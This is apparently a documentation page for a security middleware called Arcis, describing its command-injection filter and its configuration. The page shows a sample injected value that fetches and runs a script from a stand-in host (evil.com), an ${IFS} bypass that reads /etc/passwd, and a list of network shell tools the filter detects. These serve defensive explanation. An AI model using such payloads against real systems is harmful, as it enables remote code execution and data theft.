Command Injection

User input reaches exec, spawn, system, os.system, or backticks. Arcis catches shell metacharacters and known bypass sequences at the request boundary.

What it catches

Shell separators: ;, |, &, &&, ||
Command substitution: $(...), backticks, <(...)
Redirection: >, >>, <, 2>&1
Newline injection (\n, \r) for multi-line command stuffing
${IFS} internal-field-separator bypass (v1.6): cat${IFS}/etc/passwd
Dangerous commands embedded in argv: curl, wget, nc, bash -c, powershell -e
Encoded variants via NFKC + multi-decode

Sample payload

// Before (search query)
"reports.pdf; curl https://evil.com/x.sh | bash"

// After (sanitize mode)
"reports.pdf"

// In block mode: 403, vector=command, rule=patterns.command.shell-separator

Configuration

app.use(arcis({
  block: true,
  sanitize: { command: { enabled: true } }
}));

Disable or dry-run

app.post('/admin/run-script', arcis({ sanitize: { command: false } }), handler);

References

Defense-in-depth only. Never construct shell strings from user input. Use array-based execution (spawn(cmd, [args]) in Node, subprocess.run([cmd, ...args], shell=False) in Python) as your primary defense. Arcis is the second line.

← PreviousNoSQL Injection Next →Path Traversal